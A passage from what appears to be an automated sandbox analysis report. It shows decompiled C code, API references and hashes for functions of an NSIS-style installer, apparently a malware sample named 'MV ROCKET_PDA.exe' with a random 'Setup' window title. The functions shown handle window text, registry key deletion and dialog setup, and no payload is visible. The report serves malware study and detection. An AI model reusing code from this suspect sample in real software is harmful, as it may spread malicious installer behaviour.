                                                                                            • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                            • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004038E3, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x5137d0
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "gqjlpjiaybpobgywdcz Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x2
						_t27 =  *0x42ec48; // 0x51397c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x513994
								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                                            0x004038e7
                                                                                            0x004038ec
                                                                                            0x004038f2
                                                                                            0x004038f7
                                                                                            0x004038f7
                                                                                            0x004038ff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403901
                                                                                            0x00403907
                                                                                            0x0040390f
                                                                                            0x00403911
                                                                                            0x00403917
                                                                                            0x00403917
                                                                                            0x00403919
                                                                                            0x00403925
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403929
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040392b
                                                                                            0x00403930
                                                                                            0x00403939
                                                                                            0x0040393f
                                                                                            0x00403944
                                                                                            0x00403958
                                                                                            0x00403963
                                                                                            0x0040397b
                                                                                            0x00403981
                                                                                            0x00403986
                                                                                            0x0040398e
                                                                                            0x004039af
                                                                                            0x004039af
                                                                                            0x004039af
                                                                                            0x00403990
                                                                                            0x00403992
                                                                                            0x00403992
                                                                                            0x00403996
                                                                                            0x00403999
                                                                                            0x0040399d
                                                                                            0x0040399d
                                                                                            0x004039a2
                                                                                            0x004039a8
                                                                                            0x004039a8
                                                                                            0x00000000
                                                                                            0x00403992
                                                                                            0x00403946
                                                                                            0x0040394b
                                                                                            0x00403954
                                                                                            0x0040394d
                                                                                            0x0040394d
                                                                                            0x0040394d
                                                                                            0x0040394b

                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(00000000,gqjlpjiaybpobgywdcz Setup), ref: 0040397B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID: "C:\Users\user\Desktop\MV ROCKET_PDA.exe" $1033$gqjlpjiaybpobgywdcz Setup$|9Q
                                                                                            • API String ID: 530164218-910320562
                                                                                            • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                            • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                                                            • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                            • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E41280, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 21%
                                                                                            			E72E41280(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t50;
				void* _t54;

				_t28 = E72E41150(_a4);
				_v8 = _t28;
				0x72e40000(_a8, _a12);
				_t29 = _v8;
				0x72e40000("(%p)->(%s,%p)\n", _t29, _t28);
				 *_a12 = 0;
				_push(0x10);
				_push(0x72e44124);
				_push(_a8);
				L72E4247C();
				_t54 = _t50 + 0x24;
				_v12 = _t29;
				if(_v12 == 0) {
					L2:
					 *_a12 = _v8;
					L7:
					if( *_a12 == 0) {
						return 0x80004002;
					}
					0x72e40000( *_a12);
					return 0;
				}
				_push(0x10);
				_push(0x72e44154);
				_t33 = _a8;
				_push(_t33);
				L72E4247C();
				_t54 = _t54 + 0xc;
				_v16 = _t33;
				if(_v16 != 0) {
					_push(0x10);
					_push(0x72e44134);
					_t34 = _a8;
					_push(_t34);
					L72E4247C();
					_t54 = _t54 + 0xc;
					_v20 = _t34;
					if(_v20 != 0) {
						_push(0x10);
						_push(0x72e44144);
						_t35 = _a8;
						_push(_t35);
						L72E4247C();
						_t54 = _t54 + 0xc;
						_v24 = _t35;
						if(_v24 == 0) {
							 *_a12 = _v8 + 0xc;
						}
					} else {
						 *_a12 = _v8 + 8;
					}
					goto L7;
				}
				goto L2;
			}















                                                                                            0x72e4128a
                                                                                            0x72e41292
                                                                                            0x72e4129d
                                                                                            0x72e412a6
                                                                                            0x72e412af
                                                                                            0x72e412ba
                                                                                            0x72e412c0
                                                                                            0x72e412c2
                                                                                            0x72e412ca
                                                                                            0x72e412cb
                                                                                            0x72e412d0
                                                                                            0x72e412d3
                                                                                            0x72e412da
                                                                                            0x72e412f8
                                                                                            0x72e412fe
                                                                                            0x72e41352
                                                                                            0x72e41358
                                                                                            0x00000000
                                                                                            0x72e4136c
                                                                                            0x72e41360
                                                                                            0x00000000
                                                                                            0x72e41368
                                                                                            0x72e412dc
                                                                                            0x72e412de
                                                                                            0x72e412e3
                                                                                            0x72e412e6
                                                                                            0x72e412e7
                                                                                            0x72e412ec
                                                                                            0x72e412ef
                                                                                            0x72e412f6
                                                                                            0x72e41302
                                                                                            0x72e41304
                                                                                            0x72e41309
                                                                                            0x72e4130c
                                                                                            0x72e4130d
                                                                                            0x72e41312
                                                                                            0x72e41315
                                                                                            0x72e4131c
                                                                                            0x72e4132b
                                                                                            0x72e4132d
                                                                                            0x72e41332
                                                                                            0x72e41335
                                                                                            0x72e41336
                                                                                            0x72e4133b
                                                                                            0x72e4133e
                                                                                            0x72e41345
                                                                                            0x72e41350
                                                                                            0x72e41350
                                                                                            0x72e4131e
                                                                                            0x72e41327
                                                                                            0x72e41327
                                                                                            0x00000000
                                                                                            0x72e4131c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: (%p)->(%s,%p)
                                                                                            • API String ID: 1475443563-1560532818
                                                                                            • Opcode ID: 3969f9c4e6810d9e89112e1cde1ef9ff2b4a1ec2ef2da5e79bbff2143e31b81b
                                                                                            • Instruction ID: 0d65bc28ad8fdcbf5ad33954e040affb88831da238774bd43a5da8edfdfddedf
                                                                                            • Opcode Fuzzy Hash: 3969f9c4e6810d9e89112e1cde1ef9ff2b4a1ec2ef2da5e79bbff2143e31b81b
                                                                                            • Instruction Fuzzy Hash: 04314BB5A00209EBDF01DFA8EC41BAE7775BB49308F10E968F9156F340DB74AA50CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 84%
                                                                                            			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}










                                                                                            0x00402a79
                                                                                            0x00402a8a
                                                                                            0x00402a92
                                                                                            0x00402aba
                                                                                            0x00402aa1
                                                                                            0x00402aa4
                                                                                            0x00402af4
                                                                                            0x00402afa
                                                                                            0x00402afc
                                                                                            0x00000000
                                                                                            0x00402afc
                                                                                            0x00402ab1
                                                                                            0x00402ab6
                                                                                            0x00402ab8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ab8
                                                                                            0x00402acf
                                                                                            0x00402ad7
                                                                                            0x00402ade
                                                                                            0x00402b04
                                                                                            0x00402b0a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402b12
                                                                                            0x00402b18
                                                                                            0x00402b1a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402b1a
                                                                                            0x00000000
                                                                                            0x00402aed
                                                                                            0x00402b01

                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1912718029-0
                                                                                            • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                            • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                                                            • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                            • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                            0x00401ce8
                                                                                            0x00401cef
                                                                                            0x00401d1e
                                                                                            0x00401d26
                                                                                            0x00401d2d
                                                                                            0x00401d2d
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00401CE2
                                                                                            • GetClientRect.USER32 ref: 00401CEF
                                                                                            • LoadImageA.USER32 ref: 00401D10
                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                            • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                                                            • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                            • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}



















                                                                                            0x0040467e
                                                                                            0x00404683
                                                                                            0x0040468b
                                                                                            0x0040468c
                                                                                            0x00404699
                                                                                            0x004046a1
                                                                                            0x004046a2
                                                                                            0x004046a4
                                                                                            0x004046a6
                                                                                            0x004046a8
                                                                                            0x004046ab
                                                                                            0x004046ab
                                                                                            0x004046b2
                                                                                            0x004046b8
                                                                                            0x004046b8
                                                                                            0x004046bf
                                                                                            0x004046c6
                                                                                            0x004046c9
                                                                                            0x004046cc
                                                                                            0x004046cc
                                                                                            0x004046d0
                                                                                            0x004046e0
                                                                                            0x004046e2
                                                                                            0x004046e5
                                                                                            0x0040468e
                                                                                            0x0040468e
                                                                                            0x00404695
                                                                                            0x00404695
                                                                                            0x004046ed
                                                                                            0x004046f8
                                                                                            0x0040470e
                                                                                            0x0040471e
                                                                                            0x0040473a

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                            • wsprintfA.USER32 ref: 0040471E
                                                                                            • SetDlgItemTextA.USER32 ref: 00404731
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                            • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                                                            • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                            • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 51%
                                                                                            			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                            0x00401bd3
                                                                                            0x00401bdf
                                                                                            0x00401be2
                                                                                            0x00401beb
                                                                                            0x00401beb
                                                                                            0x00401bee
                                                                                            0x00401bf2
                                                                                            0x00401bfb
                                                                                            0x00401bfb
                                                                                            0x00401bfe
                                                                                            0x00401c02
                                                                                            0x00401c04
                                                                                            0x00401c51
                                                                                            0x00401c53
                                                                                            0x00401c5c
                                                                                            0x00401c64
                                                                                            0x00401c67
                                                                                            0x00401c67
                                                                                            0x00401c70
                                                                                            0x00000000
                                                                                            0x00401c06
                                                                                            0x00401c0d
                                                                                            0x00401c0f
                                                                                            0x00401c17
                                                                                            0x00401c1a
                                                                                            0x00401c42
                                                                                            0x00401c76
                                                                                            0x00401c76
                                                                                            0x00401c1c
                                                                                            0x00401c2a
                                                                                            0x00401c32
                                                                                            0x00401c35
                                                                                            0x00401c35
                                                                                            0x00401c1a
                                                                                            0x00401c79
                                                                                            0x00401c7c
                                                                                            0x00401c82
                                                                                            0x00402866
                                                                                            0x00402866
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                            • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                                                            • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                            • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                            0x004056bb
                                                                                            0x004056d2
                                                                                            0x004056da
                                                                                            0x004056da
                                                                                            0x004056e2

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                                                            • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-3916508600
                                                                                            • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                            • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                                                            • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                            • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
